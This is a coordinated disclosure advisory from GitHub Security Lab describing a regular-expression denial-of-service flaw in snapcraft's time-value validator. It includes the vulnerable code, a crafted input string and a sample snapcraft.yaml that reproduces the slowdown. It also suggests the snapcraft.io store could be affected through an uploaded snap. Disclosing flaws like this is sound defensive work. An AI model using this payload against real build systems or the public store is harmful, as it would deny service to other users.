Coordinated Disclosure Timeline

Summary

A snap with a crafted yaml file can cause a denial of service in snapcraft.

Project

snapcraft

Tested Version

8.4.4

Details

ReDoS in _validate_time (GHSL-2024-323)

_validate_time uses a regex to check that time values in a snap’s yaml file are formatted correctly:

@pydantic.field_validator(
    "start_timeout", "stop_timeout", "watchdog_timeout", "restart_delay"
)
@classmethod
def _validate_time(cls, timeval):
    if not re.match(r"^[0-9]+(ns|us|ms|s|m)*$", timeval):
        raise ValueError(f"{timeval!r} is not a valid time value")

    return timeval

For example, 10s or 10ms are both valid times. But the regex has a ReDoS vulnerability, which means that it runs very slowly on invalid inputs like this:

0msmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsx

To reproduce the ReDoS with snapcraft, first create an empty snap by running this command:

snapcraft init

Then replace the contents of ./snap/snapcraft.yaml with this text:

name: GHSL-2024-323
base: core24

apps:
  GHSL-2024-323:
    command: /bin/echo kevwozere
    restart-delay: 0msmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsx

Now run the following command and observe that it takes a long time to finish:

snapcraft

The running time increases exponentially with the length of the invalid string.

This vulnerability was discovered with the help of CodeQL’s Inefficient regular expression query.

Impact

This issue may lead to denial of service. We have only tested our PoC locally, but it may also be possible to trigger a denial of service on https://snapcraft.io/ by uploading a malicious snap.

Credit

This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-323 in any communication regarding this issue.